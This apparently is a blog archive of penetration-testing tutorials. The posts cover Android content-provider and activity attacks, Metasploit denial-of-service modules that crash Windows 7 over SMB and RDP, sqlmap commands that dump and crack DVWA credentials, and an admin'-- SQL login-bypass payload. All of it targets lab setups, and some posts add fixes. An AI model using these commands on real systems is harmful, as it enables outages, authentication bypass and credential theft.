Tuesday 13 January 2015

Android Hacking and Security, Part 2: Content Provider Leakage

In the previous article, we discussed how an attacker exploits vulnerable Activity Components and ways to secure them. In this article, we will discuss “Content Provider Leakage”.

What are Content Providers?

As per Google’s inbuilt security model, application data is private to an application, hence it is not possible for an application to access another application’s data by default. When applications want to share their data with other applications, Content Provider is a way which acts as an interface for sharing data between applications. Content providers use standard insert(), query(), update(), and delete() methods to access application data. A special form of URI which starts with “content://” is assigned to each content provider. Any app which knows this URI can insert, update, delete, and query data from the database of the provider app.



There may be some cases where content providers might not be implemented for sharing data with other apps, or the developer may want to give access only to those apps which have proper permissions. In such cases, if proper security controls are not enforced in the app, that leads to leakage of information.

The inbuilt SMS application in Android devices is a classic example of content providers. Any app can query the inbox from the device using its URI
content://sms/inbox. But, READ_SMS permission must be declared in the app’s AndroidManifest.xml file in order to access the SMS app’s data.

Prerequisites to follow the steps


  • Computer with Android SDK installed

  • A non-rooted mobile device to install the app


Testing the application’s functionality

After downloading the test application, install it in the non-rooted android device in order to test and exploit it.

It can be installed with adb using the following command:

adb install <name of the apk>.apk

It has a feature to store data inside the application. When we launch it, it appears as shown in the figure.



The goal is to find out if there are any content providers implemented in this app and if YES, we need to check and exploit if they are vulnerable to data leakage.

Topics Involved

  • Information gathering

  • Attacking vulnerable content providers

  • Securing the applications


Information gathering

Like any other pentest, let’s start with information gathering. We assume that we have the APK file with us. So, decompile the downloaded APK file as shown in Part 1 and check AndroidManifest.xml file for any registered content providers. We should also check the smali files for all the URIs used in the app.

Content Providers are generally registered in the AndroidManifest.xml file in the following format.



So let’s go ahead and examine the manifest file.



We have one content provider registered in the AndroidManifest.xml file and the good news is, it is exported to be accessed by all other apps.

Attacking Vulnerable Content Providers

This is the most interesting part. Let’s now try to query the content provider we found. If it returns any data, then it is vulnerable. This can be done in multiple ways.

  1. Using adb shell

  2. Using a malicious app to query

  3. Using Mercury Framework


Using adb

To query the content provider from adb, the app should be installed on the device.

Get an adb shell on the device and type the following command to query the content provider. In my case, I am going to query the URI I found in MyProvider.smali file which is extracted by the APK tool.

Content –query –uri content://com.isi.contentprovider.MyProvider/udetails

We should now see all the details stored into the app’s db as show in the figure below.



Using a malicious app to query

We can even write a malicious app to query the data from its content provider. Following is the code snippet to query the inbox from a mobile device.



Using Mercury Framework

The entire process can be carried out using Mercury Framework in even more efficient and simple way.

Securing the Applications


  1. Setting android:exported attribute’s value to false:

    In the AndroidManifest.xml file of our application, we should add the following attribute to the content provider to be secured. In our case, com.isi.contentprovider.MyProvider is the content provider.



    If we try to query the content provider whose android:exported value is set to false, it will throw an exception as shown below.



    Note: The Default value of android:exported is true for all the applications using an API level lower than 17.


  2. Limiting access with custom permissions

    We can also impose permission-based restrictions by defining custom permissions for an activity. This is helpful if the developer wants to limit the access to his app’s components to those apps which have permissions.


Other issues with Content Providers

SQL injection: If security controls are not properly implemented, content providers can lead to client side attacks like SQL injection. This works similarly to traditional SQL injection attacks.

Path Traversal: This is one more attack which can be carried out if a content provider is not properly implemented. This is similar to the path traversal attacks on web applications. It allows an attacker to traverse and view the local file system. Sensitive files can be transferred from the device to the local machine using an app vulnerable to Path Traversal attack.

Windows 7 Exploitation

Microsoft Windows 7 is much more secure than Microsoft Windows XP. The Windows XP operating system has lots of OS vulnerabilities and the malware infection rate is also very high compared to other operating systems. According to the Microsoft Security Intelligence Report, which details in depth the state of software vulnerabilities, exploits, security breaches, and malware in 2010 is shown in the figure below.



As per the above graph, Microsoft found that Windows 7 64-bit had the lowest number at 2.5, while the 32-bit version had 3.8 per 1000 computers. Windows XP with SP3 came in with 15.9 infections per 1,000, while XP with SP2 had the highest number at 19.3. Windows Vista’s infection rate was considerably lower than that for XP but still turned out to be double that for Windows 7.

Now we will see the two major vulnerabilities of the Windows 7 64-bit operating system and their exploitation methods.

Microsoft Windows 7/Server 2008 R2 SMB Client Infinite

Loop: This exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. Basically, it crashes the remote kernel. Metasploit Framework has a module for exploiting this vulnerability. To trigger this bug, run this module as a service and it forces a vulnerable client to access the IP of this system as an SMB server. This can be accomplished by embedding a UNC path (HOSTsharesomething) into a web page if the target is using Internet Explorer, or a Word document otherwise. An attacker can remotely crash any Windows 7/Server 2008R2 on a LAN or via IE.

Tutorial: Now we are going to see how to exploit this vulnerability by using Metasploit Framework. Open the terminal and run msfconsole, then type in: use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop



After that, type in show options to check all the available options for this module.



As we can see in the above figure, there are some options for this module. We can see here that the options that are required are showing “yes.” The first option is SRVHOST, which refers to the server host address; it means we have to set our local machine address here. The second options is SRVPORT, the server port address, which is showing 445; this means that port no. 445 must be enabled to successfully run this module.

Let us set the all required options: Type in set SRVHOST 192.168.0.3:



Now we are ready to run this module, so type run:



As we can see in the above figure, after typing the “run” command, the msfconsole shows the messages, “Starting the malicious SMB service” and “To trigger, the vulnerable client should try to access: \192.168.0.103.”

So we are going to access this IP from the Windows 7 system.



After accessing this IP from “Run,” my Windows system just hung that time and I was not able to do anything on that system. Then I immediately opened my task manager to check the CPU usage and it was on peak.



MS12-020 Microsoft Remote Desktop Use-After-Free DoS

Multiple vulnerabilities in the Windows Remote Desktop Protocol (RDP) could allow attackers to take complete control of affected systems or cause a denial-of-service. The Remote Desktop Protocol provides a graphical interface for users to establish a virtual session to other hosts on the network. Successfully exploiting this vulnerability would then allow the attacker to install programs; view, change, or delete data; or create new accounts with full user rights. This could also result in producing a denial of service condition on targeted systems.

The vulnerability is triggered when accessing a freed memory object (use-after-free) and does not require authentication. An attacker could exploit this vulnerability only if RDP is enabled and:


  • If the operating system is Windows XP or Windows Server 2003, a remote unauthenticated attacker could exploit this vulnerability.


  • If the operating system is Windows Vista, Windows 7, or Windows Server 2008 and network level authentication is turned off, a remote unauthenticated attacker could exploit this vulnerability.


  • If the operating system is Windows Vista, Windows 7, or Windows Server 2008 and network level authentication is turned on in RDP, an attacker would have to authenticate with a valid account in order to exploit this vulnerability.


Tutorial: Now we are going to see how to exploit this vulnerability by using Metasploit Framework. Before that, we will run an nmap scan on our target to check whether or not the RDP is enabled.



After completing the scan, we can see in the above figure that port 3389 is enabled on the target system and now we can run our Metasploit module. Open the terminal and run msfconsole, then type in: use auxiliary/dos/windows/rdp/ms12_020_maxchannelids



After that, type in show options to check all the available options for this module.



As we can see in the above figure, there are some options for this module. We can see that the options that are required show “yes.” The first option is RHOST, which refers to the remote host address; it means we have to set our target machine address here. The second option is RPORT, meaning the remote port address, which shows 3389; this means that port no. 3389 must be enabled to successfully run this module.

Let us set the all required options type in set RHOST 192.168.0.3:



Now we are ready to run this module, so type run:




Now we can see on the left-hand side of the above figure my Metasploit machine and, after triggering the “run” command, the message shows in the terminal, “210 bytes sent, Checking RDP status” and on the right side, my Windows 7 system is crashed and the blue screen of death is showing there.

Recommendation


The best practice is have automatic updating enabled and we will not need to take any action because this security update will be downloaded and installed automatically. But those who are not using automatic updates can download the security updates from here: http://technet.microsoft.com/en-in/security/bulletin/MS12-020 . Now I am using this patch in my vulnerable system and again we will try to attack to see if that patch is working or not.



Just download the patch and install it in the system.



Wait for few moments and it’s done. Now we are going to try another attack on this system. Just run the same module with same steps as shown above.



As we can see in above figure the module ran successfully, but there is no effect on the Windows 7 system.

References

http://www.rapid7.com/db/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop

http://www.rapid7.com/db/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids

http://news.cnet.com/8301-1009_3-20063220-83.html
Read more...

Saturday 10 January 2015

Android Hacking and Security, Part 1: Exploiting and Securing Application Components

Mobile Application Security is one of the hottest segments in the security world, as security is really a big concern with growing mobile applications. In this article, we will go through the attacks associated with Android application components.

What are Android Application Components?

Application components are essential building blocks of an Android App. Every app is built as a combination of some or all of those components, which can be invoked individually. There are four main components in Android, which are explained below.

Activity: An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.

Example: Login screen of your Facebook app.

Service: A Service can perform long-running operations in the background and does not provide a user interface.

Example: Playing Music

Content Providers: A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.

Example: Using content providers, any app can read SMS from inbuilt SMS app’s repository in our device.

*READ_SMS permission must be declared in the app’s AndroidManifest.xml file in order to access SMS app’s data.

Broadcast Receivers: A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low, boot completed, headset plug etc. Though most of the broadcast receivers are originated by the system, applications can also announce broadcasts.

This article focuses on demonstrating the methodology to attack and secure vulnerable Activity components of applications.

Background:

You can download the sample application used in this article and follow the steps along with us.

As shown in the figure below, this app has two activities. The first activity takes a password as input. If the user enters the correct password he will be landed in a page which says “Private Area”, otherwise he will get a “Wrong password” message. For test purposes, the password to login is set as “password”. Ideally, the first screen should use an intent and invoke the second screen if a valid password is entered. We need to perform black box testing on this app to see if we can bypass the authentication by directly invoking the welcome screen.



 

 

 

 

 

 

 

 

 

 


Prerequisites to follow the steps

Computer with Android SDK Installed

A Non Rooted mobile device to install the app.

Topics Involved:

Information gathering

Attacking Vulnerable Activity Components

Securing the applications

Information gathering

  1. Decompile the app with APK tool.

  2. Analyze AndroidManifest.xml file for exported Activity components.


Every Android App has a package name and every Activity has its own Class name inside the package. The initial steps are to find out the name of the package and names of the available sensitive activities. Though there are other methods to get this information, looking at the AndroidManifest.xml is a good approach. We can get the AndroidManifest.xml file by decompiling the application using APKTOOL.


  1. Download APKTOOL from the link below.

    https://code.google.com/p/android-apktool/downloads/list

  2. Place the test application in the same folder as in APKTOOL.


  3. Now, decompile the APK file using the following command as shown in the figure:

    apktool d testapp.apk




As shown in the figure below, we should now be able to see a new folder named “testapp” with the AndroidManifest.xml file inside it.



Now, we need to search for the package name and its activities.

All the activities will be registered in AndroidManifest.xml file using <activity></activity> tags. So, anything inside these tags will be an activity. Looking at the AndroidManifest.xml file, we are able to see two Activity Components and the package name as shown in the figure below.



By examining the above figure, it is clear that we got the following information about the app.

com.isi.testapp is the name of the package.

com.isi.testapp.Welcome could be the activity we are getting after providing the correct password.


Attacking Vulnerable Activity Components

Our job now is to launch Welcome activity without providing any password in the first screen.

We can perform attacks on vulnerable activity components in several ways, as mentioned below.

  1. Launching sensitive Activities with Activity Manager Tool.

  2. Using a Malicious App to invoke Activities of other apps.

  3. We can also use Mercury framework for performing these attacks, which will be covered in later articles.


Launching sensitive activities with Activity manager tool

Activity Manager is a tool that comes preinstalled with Android SDK and can be used along with “adb shell”. This tool can be used to launch Activities and Services of an application. We can even pass intents using it.

So, let’s begin.


  1. Connect the device to the computer and get a shell on the device using the following command:

    adb shell


  2. Type in the following command to launch the Welcome activity:

    am start –n com.isi.testapp/.Welcome


We should now see the welcome screen fired up without providing the password.

Using a Malicious App to invoke Activities of other apps

Another way of invoking other application’s activities is to write a malicious app and feed it with the name of the package and activity to be launched. The figure below is a code snippet to launch an activity where incom.isi.testapp.Welcome is the activity to be launched. In our case, the malicious app doesn’t require any permission to launch the “Welcome” activity of the vulnerable app.



Using Mercury framework

The same attack can be reproduced with Mercury framework. We will discuss Mercury framework later in this series.

Securing the application components


  1. Setting android:exported attribute’s value to false

    In the AndroidManifest.xml file of our application, we should add the following attribute to the application component to be secured. In our case com.isi.testapp.Welcome
    is the activity to be secured.



    The above code restricts other applications or any system component other than the current app from accessing this Activity. Only applications that have the same user id as the current app will be able to access this Activity.


  2. Limiting access with custom permissions

    The android:exported attribute is not the only way to limit an activity’s exposure to other applications. We can also impose permission-based restrictions by defining custom permissions for an activity. This is helpful if the developer wants to limit the access to his app’s components to those apps which have permissions.


Note: The above security controls are applicable to any other Application component which we discussed in the beginning of the article.

References:

http://developer.android.com/guide/components/index.html


Read more...

What Is Sqlmap And How To Use It.....



Today we are talking about SQLmap, a SQL injection tool that is used for detection and exploitation of SQLI.

What is SQLmap?

SQLmap is a free and an open source tool that is used to detect and exploit SQL injection flaws. It has very nifty features that automate the process of detection and exploitation (database fingerprinting, access underlying file system, execute commands).

You can download SQLmap from SourceForge here: http://sourceforge.net/projects/sqlmap/

Who are the authors of SQLmap?

Bernardo Damele Assumpcao Guimaraes (@inquisb), you can contact him at bernardo@sqlmap.org and Miroslav Stampar (@stamparm), you can contact him at miroslav@sqlmap.org.

You can contact both developers by writing to dev@sqlmap.org.

What are commands of SQLmap?

Go to the folder that sqlmap.py resides in, and write the command:

#python sqlmap.py -h


Here is the full list of available options:

Options:

  • –version show program’s version number and exit

  • -h, –help show this help message and exit

  • -v VERBOSE Verbosity level: 0-6 (default 1)


Target:

At least one of these options has to be specified to set the source to get target urls from

  • -d DIRECT Direct connection to the database

  • -u URL, –url=URL Target URL

  • -l LOGFILE Parse targets from Burp or WebScarab proxy logs

  • -m BULKFILE Scan multiple targets enlisted in a given textual file

  • -r REQUESTFILE Load HTTP request from a file

  • -g GOOGLEDORK Process Google dork results as target URLs

  • -c CONFIGFILE Load options from a configuration INI file


Request:

These options can be used to specify how to connect to the target URL.

  • –data=DATA Data string to be sent through POST

  • –param-del=PDEL Character used for splitting parameter values

  • –cookie=COOKIE HTTP Cookie header

  • –load-cookies=LOC File containing cookies in Netscape/wget format

  • –cookie-urlencode URL Encode generated cookie injections

  • –drop-set-cookie Ignore Set-Cookie header from response

  • –user-agent=AGENT HTTP User-Agent header

  • –random-agent Use randomly selected HTTP User-Agent header

  • –randomize=RPARAM Randomly change value for given parameter(s)

  • –force-ssl Force usage of SSL/HTTPS requests

  • –host=HOST HTTP Host header

  • –referer=REFERER HTTP Referer header

  • –headers=HEADERS Extra headers (e.g. “Accept-Language: frnETag: 123″)

  • –auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM)

  • –auth-cred=ACRED HTTP authentication credentials (name:password)

  • –auth-cert=ACERT HTTP authentication certificate (key_file,cert_file)

  • –proxy=PROXY Use a HTTP proxy to connect to the target url

  • –proxy-cred=PCRED HTTP proxy authentication credentials (name:password)

  • –ignore-proxy Ignore system default HTTP proxy

  • –delay=DELAY Delay in seconds between each HTTP request

  • –timeout=TIMEOUT Seconds to wait before timeout connection (default 30)

  • –retries=RETRIES Retries when the connection timeouts (default 3)

  • –scope=SCOPE Regexp to filter targets from provided proxy log

  • –safe-url=SAFURL Url address to visit frequently during testing

  • –safe-freq=SAFREQ Test requests between two visits to a given safe url

  • –skip-urlencode Skip URL encoding of POST data


  • –eval=EVALCODE Evaluate provided Python code before the request (e.g.


    • “import hashlib;id2=hashlib.md5(id).hexdigest()”)




Optimization:

These options can be used to optimize the performance of SQLmap.

  • -o Turn on all optimization switches

  • –predict-output Predict common queries output

  • –keep-alive Use persistent HTTP(s) connections

  • –null-connection Retrieve page length without actual HTTP response body

  • –threads=THREADS Max number of concurrent HTTP(s) requests (default 1)


Injection:

These options can be used to specify which parameters to test for,and provide custom injection payloads and optional tampering scripts

  • -p TESTPARAMETER Testable parameter(s)

  • –dbms=DBMS Force back-end DBMS to this value

  • –os=OS Force back-end DBMS operating system to this value

  • –invalid-bignum Use big numbers for invalidating values

  • –invalid-logical Use logical operations for invalidating values

  • –no-cast Turn off payload casting mechanism

  • –prefix=PREFIX Injection payload prefix string

  • –suffix=SUFFIX Injection payload suffix string

  • –skip=SKIP Skip testing for given parameter(s)

  • –tamper=TAMPER Use given script(s) for tampering injection data


Detection:

These options can be used to specify how to parse and compare page content from HTTP responses when using the blind SQL injection technique.

  • –level=LEVEL Level of tests to perform (1-5, default 1)

  • –risk=RISK Risk of tests to perform (0-3, default 1)

  • –string=STRING String to match in the response when query is valid

  • –regexp=REGEXP Regexp to match in the response when query is valid

  • –code=CODE HTTP response code to match when the query is valid

  • –text-only Compare pages based only on the textual content

  • –titles Compare pages based only on their titles


Techniques:

These options can be used to tweak testing of specific SQL injection techniques.

  • –technique=TECH SQL injection techniques to test for (default “BEUST”)

  • –time-sec=TIMESEC Seconds to delay the DBMS response (default 5)

  • –union-cols=UCOLS Range of columns to test for UNION query SQL injection

  • –union-char=UCHAR Character to use for bruteforcing number of columns

  • –dns-domain=DNAME Domain name used for DNS exfiltration attack


Fingerprint:

  • –f, –fingerprint Perform an extensive DBMS version fingerprint


Enumeration:

These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements.

  • -b, –banner Retrieve DBMS banner

  • –current-user Retrieve DBMS current user

  • –current-db Retrieve DBMS current database

  • –is-dba Detect if the DBMS current user is DBA

  • –users Enumerate DBMS users

  • –passwords Enumerate DBMS users password hashes

  • –privileges Enumerate DBMS users privileges

  • –roles Enumerate DBMS users roles

  • –dbs Enumerate DBMS databases

  • –tables Enumerate DBMS database tables

  • –columns Enumerate DBMS database table columns

  • –schema Enumerate DBMS schema

  • –count Retrieve number of entries for table(s)

  • –dump Dump DBMS database table entries

  • –dump-all Dump all DBMS databases tables entries

  • –search Search column(s), table(s) and/or database name(s)

  • -D DB DBMS database to enumerate

  • -T TBL DBMS database table to enumerate

  • -C COL DBMS database table column to enumerate

  • -U USER DBMS user to enumerate

  • –exclude-sysdbs Exclude DBMS system databases when enumerating tables

  • –start=LIMITSTART First query output entry to retrieve

  • –stop=LIMITSTOP Last query output entry to retrieve

  • –first=FIRSTCHAR First query output word character to retrieve

  • –last=LASTCHAR Last query output word character to retrieve

  • –sql-query=QUERY SQL statement to be executed

  • –sql-shell Prompt for an interactive SQL shell


Brute force:

These options can be used to run brute force checks.

  • –common-tables Check existence of common tables

  • –common-columns Check existence of common columns


User-defined function injection:

These options can be used to create custom user-defined functions

  • –udf-inject Inject custom user-defined functions

  • –shared-lib=SHLIB Local path of the shared library


File system access:

These options can be used to access the back-end database management system underlying file system.

  • –file-read=RFILE Read a file from the back-end DBMS file system

  • –file-write=WFILE Write a local file on the back-end DBMS file system

  • –file-dest=DFILE Back-end DBMS absolute filepath to write to


Operating system access:

These options can be used to access the back-end database management system and underlying operating system.

  • –os-cmd=OSCMD Execute an operating system command

  • –os-shell Prompt for an interactive operating system shell

  • –os-pwn Prompt for an out-of-band shell, meterpreter or VNC

  • –os-smbrelay One click prompt for an OOB shell, meterpreter or VNC

  • –os-bof Stored procedure buffer overflow exploitation

  • –priv-esc Database process’ user privilege escalation

  • –msf-path=MSFPATH Local path where Metasploit Framework is installed

  • –tmp-path=TMPPATH Remote absolute path of temporary files directory


Windows registry access:

These options can be used to access the back-end database management system Windows registry.

  • –reg-read Read a Windows registry key value

  • –reg-add Write a Windows registry key value data

  • –reg-del Delete a Windows registry key value

  • –reg-key=REGKEY Windows registry key

  • –reg-value=REGVAL Windows registry key value

  • –reg-data=REGDATA Windows registry key value data

  • –reg-type=REGTYPE Windows registry key value type


General:


These options can be used to set some general working parameters.

  • -t TRAFFICFILE Log all HTTP traffic into a textual file

  • –batch Never ask for user input, use the default behaviour

  • –charset=CHARSET Force character encoding used for data retrieval

  • –check-tor Check to see if Tor is used properly

  • –crawl=CRAWLDEPTH Crawl the website starting from the target url

  • –csv-del=CSVDEL Delimiting character used in CSV output (default “,”)

  • –eta Display for each output the estimated time of arrival

  • –flush-session Flush session file for current target

  • –forms Parse and test forms on target url

  • –fresh-queries Ignores query results stored in session file

  • –hex Uses DBMS hex function(s) for data retrieval

  • –parse-errors Parse and display DBMS error messages from responses

  • –replicate Replicate dumped data into a sqlite3 database

  • –save Save options to a configuration INI file

  • –tor Use Tor anonymity network

  • –tor-port=TORPORT Set Tor proxy port other than default

  • –tor-type=TORTYPE Set Tor proxy type (HTTP – default, SOCKS4 or SOCKS5)

  • –update Update sqlmap


Miscellaneous:

  • -z MNEMONICS Use short mnemonics (e.g. “flu,bat,ban,tec=EU”)

  • –beep Sound alert when SQL injection found

  • –check-payload Offline WAF/IPS/IDS payload detection testing

  • –check-waf Check for existence of WAF/IPS/IDS protection

  • –cleanup Clean up the DBMS by sqlmap specific UDF and tables

  • –dependencies Check for missing sqlmap dependencies

  • –disable-hash Disable password hash cracking mechanism

  • –disable-like Disable LIKE search of identificator names

  • –gpage=GOOGLEPAGE Use Google dork results from specified page number

  • –mobile Imitate smartphone through HTTP User-Agent header

  • –page-rank Display page rank (PR) for Google dork results

  • –purge-output Safely remove all content from output directory

  • –smart Conduct through tests only if positive heuristic(s)

  • –test-filter=TSTF Select tests by payloads and/or titles (e.g. ROW)

  • –wizard Simple wizard interface for beginner users

  • [*] shutting down at 17:46:04


As you can see SQLmap is well categorized as Target options, Request options, Optimization, Injection, Detection, Techniques, Fingerprint, Enumeration, etc.

How can I use SQLmap ?

For demonstration we create two virtual machines :

  1. Victim machine that’s running window XP OS that has a web server that holds a vulnerable web application for example (DVWA).

  2. Attacker machine that will be using Ubuntu 12.04 that is running SQLmap.


In this lab we will do the following : Use SQLmap to obtain the following pieces of information:

  1. Enumerate MYSQL usernames and passwords.

  2. Enumerate all databases.

  3. Enumerate tables for a specified database.

  4. Enumerate all users and passwords for a specified database table.


We need some information before beginning SQLmap and we need the current session cookies to maintain our state while penetrating, so I will use a Firefox add-on called “TamperData”.



Our cookie in this case is “security=high; PHPSESSID=57p5g7f32b3ffv8l45qppudqn3″.


Then we will set DVWA security to low for demonstration:



Now lets go to the SQL injection section and enter any value and press submit. We will see the ID parameter in the get request like this:

“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”


So this is our target page.

The following command will retrieve current database and current user:

“./sqlmap.py -u “http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” -b –current-db –current-user”


Used Options:

  1. -cookie : to set our cookie values “we change security from high to low in the cookie values”

  2. -u : to specify our target URL

  3. -b : to retrieve DBMS banner

  4. -current-db : to retrieve the current database

  5. -current-user: to retrieve the current user


Here are the results:



As you can see:

DBMS : MySQL version 5.0


OS version Ubuntu 12.04


current user: root


current db : DVWA


The following command will enumerate all DBMS users and password hashes that can crack it later for any further attacks.

“sqlmap.py -u “http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” –string=”Surname” –users –password”


Used Options:

  1. –string : String to match in page when the query is valid

  2. –users : Enumerate DBMS users

  3. –password : Enumerate DBMS users password hashes




Here are the results:

database management system users [142]:

[*] ”@’kingasmk’

[*] ”@’localhost’

[*] ‘debian-sys-maint’@’localhost’

[*] ‘phpmyadmin’@’localhost’

[*] ‘root’@’127.0.0.1′

[*] ‘root’@’::1′

[*] ‘root’@’kingasmk’

[*] ‘root’@’localhost’

Database management system users password hashes:

[*] debian-sys-maint [1]:


password hash: *C30441E06530498BC86019BF3211B94B3BAB295A


[*] phpmyadmin [1]:


password hash: *C30441E06530498BC86019BF3211B94B3BAB295A


[*] root [4]:


password hash: *C30441E06530498BC86019BF3211B94B3BAB295A


password hash: *C30441E06530498BC86019BF3211B94B3BAB295A


password hash: *C30441E06530498BC86019BF3211B94B3BAB295A


password hash: *C30441E06530498BC86019BF3211B94B3BAB295A


You can use any password cracker tool to get the plain text from that hash like “cain and abel, john and ripper”. The following command will enumerate all databases sachems on the system:

“sqlmap.py -u “http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”


–cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” –dbs”


Used Options:

  • –dbs: Enumerate DBMS databases




Here are the results:

available databases [5]:

[*] dvwa

[*] information_schema

[*] mysql

[*] performance_schema

[*] phpmyadmin

Now we will try to enumerate DVWA tables.So let’s run this command:

“sqlmap.py -u “http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” -D dvwa –tables”



  1. Used Options:




  1. -D : DBMS database to enumerate

  2. -tables : Enumerate DBMS database tables




Here are the results:

Database: dvwa

[2 tables]

+————+

| guestbook |

| users |

+————+

Now let’s obtain the columns of users table.

Here are the commands:

“sqlmap.py -u “http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” -D dvwa -T users –columns”


Used Options:

  • -T : DBMS database table to enumerate

  • -columns : Enumerate DBMS database table columns




Here are the results:

Database: dvwa

Table: users

[6 columns]

+————+————-+

| Column | Type |

+————+————-+

| avatar | varchar(70) |

| first_name | varchar(15) |

| last_name | varchar(15) |

| password | varchar(32) |

| user | varchar(15) |

| user_id | int(6) |

+————+————-+

As you can see, there are interesting columns, those are user and password, lets dump them :) This command will dump all users and passwords values from user and password tables:

“sqlmap.py -u “http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” -D dvwa -T users -C user,password –dump”


Used Options:

  • -T : DBMS database table to enumerate

  • -C: DBMS database table column to enumerate

  • -dump : Dump DBMS database table entries


SQLmap will ask you to crack your passwords, press enter to crack them:



Here are all users and plain text passwords :)

Database: dvwa

Table: users

[5 entries]

+———+———+———————————————+

| user_id | user | password |

+———+———+———————————————+

| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |

| 2 | gordonb | e99a18c428cb38d5f260853678922e03 (abc123) |

| 3 | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |

| 4 | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |

| 5 | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |

+———+———+———————————————+

So now you can login as admin and change everything you want :)

Conclusion

SQLmap is a very powerful tool that should you practice to ease and automate the process of detection and exploitation.


Read more...

SQL INJECTION THROUGH SQLMAP BURP PLUGIN

This is an overview of SQLMAP, an SQL Injection tool used for detecting and exploiting the SQLI.

What is SQLI?


SQL Injection is a web based attack used by hackers to steal sensitive information from organizations through web applications. It is one of the most common application layer attacks used today. This attack takes advantage of improper coding of web applications, which allows hackers to exploit the vulnerability by injecting SQL commands into the prior web application.

The underlying fact that allows for SQL Injection is that the fields available for user input in the web application allow SQL statements to pass through and interact with or query the database directly.

For example, let us consider a web application that implements a form-based login mechanism to store the user credentials and performs a simple SQL query to validate each login attempt. Here is a typical example:

select * from users where username=’admin’ and password=’admin123′;

If the attacker knows the username of the application administrator is admin, he can login as admin without supplying any password.

admin’–

The query in the back-end looks like:

Select * from users where username=’admin’–’ and password=’xxx’;

Note the comment sequence (–) causes the followed query to be ignored, so query executed is equivalent to:

Select * from users where username=’admin’;

So password check is bypassed.

What is SQLMAP?


SQLMAP is an open source penetration testing tool that helps in automating the process of detecting and exploiting SQL injection vulnerabilities and taking full access over the database servers. SQLMAP comes with a powerful detecting engine, along with many niche features for the penetration tester and a wide range of switches lasting from database fingerprinting, data fetching from the database, accessing the underlying file system, and executing the commands on Operating System via out-of-band Connections.

Since SQLMAP is developed in Python it is a portable application, meaning that it will work in any operating system that supports Python.

What is SQLMAP burp plug-in?


When we audit a web application, we normally configure an intermediate proxy to have more control over the request and response parameters.

SQLMAP plug-in is an add-on feature that we can configure to the burp through which we can redirect a URL or a request directly to the SQLMAP with a single mouse click.

How to download the plug-inYou can download the zip file from the following URL:

http://code.google.com/p/gason/downloads/list

Unzip the file and keep it in the same folder where burp proxy is located.

Then execute the following command to run the burp with plug-in.



  1. LINUX:




Java –classpath burpplugins.jar:”burpsuite_v1.4.0.1.jar” burp.StartBurp


  1. Windows:




Java –classpath burpsuite_v1.4.0.1.jar,burpplugins.jar burp.StartBurp

Replace the burpsuite with the appropriate version that you are using. In my case I am using burpsuite_v1.4.0.1.jar

You need to download the SQLMAP as you need to give the executable to the plug-in.


  1. Setting up SQLMAP:




    1. On Windows:









  1. On Debian or Ubuntu







  1. Setting up the environment





  • If you are using OWASP broken web application, then simply access one of the vulnerable sites from your local browser where you are running SQLMAP.

  • If you don’t use OWASP broken web application, then you need to set up a virtual machine that has a web server to host the vulnerable web application.

  • Configure another VM with Ubuntu where the attacker runs SQLMAP.




  1. Configuring the Proxy





  • If you are using Mozilla Firefox, then go to Edit > Preferences > Advanced > Network > Settings and select “Manual Proxy Configuration” by enabling the radio button. Run the HTTP proxy with local-host and the port in which the proxy is running.

  • If you are using Chrome, then go-to Settings > Show Advanced Options > Network > Change Proxy Settings > Connections > LAN Settings.




  1. How to use the plug-in




Once you load the plug-in, then it is very easy to make use of it. Run the burp proxy with the loaded plug-in. In the “site map” tab under the “target” you can see the particular domain that you are trying to test for SQLI and all the crawled pages related to the domain.

On the right side click on the URL that you want to test, you can see the request parameters of the URL in the bottom panel. Right click on the request parameters and you can see the option “Send to sqlmap” as shown in the figure (I).



Figure(I)

Then you can see a new window (SQLMap wrapper) that will allow you to configure sqlmap. The below image gives you a clear view of the wrapper. Let’s observe figure (II):



Figure (II)

Now let us have an overview of the configuration features of the wrapper. In the “Target” textbox specify the URL that you are willing to test. (Normally it will be filled by default as you have sent the request parameters previously, if needed you can change the URL).

Specify the method on which the domain is accessible (GET/POST). In the “Bin-path” give sqlmap executable.

If you are aware of the DBMS of the web application, specify the database by selecting one of the options listed in the dropdown list. By default “auto” is selected which means that the SQLMAP wrapper tries with all the databases listed in the dropdown list to find out the database used by the application.

You can enumerate the database users, passwords, roles, privileges, databases, etc. by selecting the appropriate option from the Action dropdown list. By default it is set to “auto” which means it will try to enumerate all the options listed in the dropdown list in sequential order.

If you are aware of the databases, users, tables, or columns, you can enumerate it by simply specifying it in the Database options.

Tampers are a kind of special characters or symbols that you are willing to insert into the query while pen-testing the application.

Once you configure the SQLMAP, click on “RUN”, this will open a new tab with execution of the program with the configuration that you have given to the wrapper or the SQLMAP. We can make any number of simultaneous execution tabs with different instances.

The below image shows the output tab. Let’s observe figure (III):

Figure (III)

